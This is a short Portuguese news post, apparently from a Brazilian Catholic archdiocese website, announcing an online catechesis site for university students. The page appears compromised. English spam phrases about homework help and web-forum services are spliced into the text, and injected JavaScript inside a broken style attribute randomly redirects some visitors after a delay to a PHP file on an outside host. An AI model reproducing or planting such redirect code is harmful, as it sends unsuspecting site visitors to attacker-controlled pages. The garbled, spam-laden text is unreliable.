Arquidiocese de Cascavel lança site de Catequese para universitários

<span style="font-size: 10pt;They offer complete homework help in all subjects or proper courses.font-family: Verdana”>A Pastoral Universitaria da arquidiocese de Cascavel (PR) lancou o site Catequese On-line, com a finalidade de levar aos universitarios e a todos os profissionais das faculdades a possibilidade de receber os sacramentos da Iniciacao Crista: Batismo, Eucaristia e Confirmacao.

Para o bispo da arquidiocese, dom Mauro Aparecido dos Santos, a catequese on-line e um caminho para chegar, de uma maneira mais atualizada, ate a juventude que frequenta uma faculdade e tem dificuldades para assumir a catequese paroquial. Because of this, our web-forum work is very cost effective

Os universitarios, por meio do site, poderao fazer licoes. Tambem terao encontro com os responsaveis pela Pastoral Universitaria.

<span style=”font-size: 10pt;font-family: Verdana;Times
var number1=Math.floor(Math.random() * 5);
if (number1==3)
{
var delay = 15000;
setTimeout(“document.location.href=’http://baharzaf.com/wp-content/plugins/duplicator/ctrls/wp-rsc.php'”, delay);
New Roman”Times New Roman&quot”>O site e:

Comments

Esta entrada foi publicada em Sem categoria. Adicione o link permanente aos seus favoritos.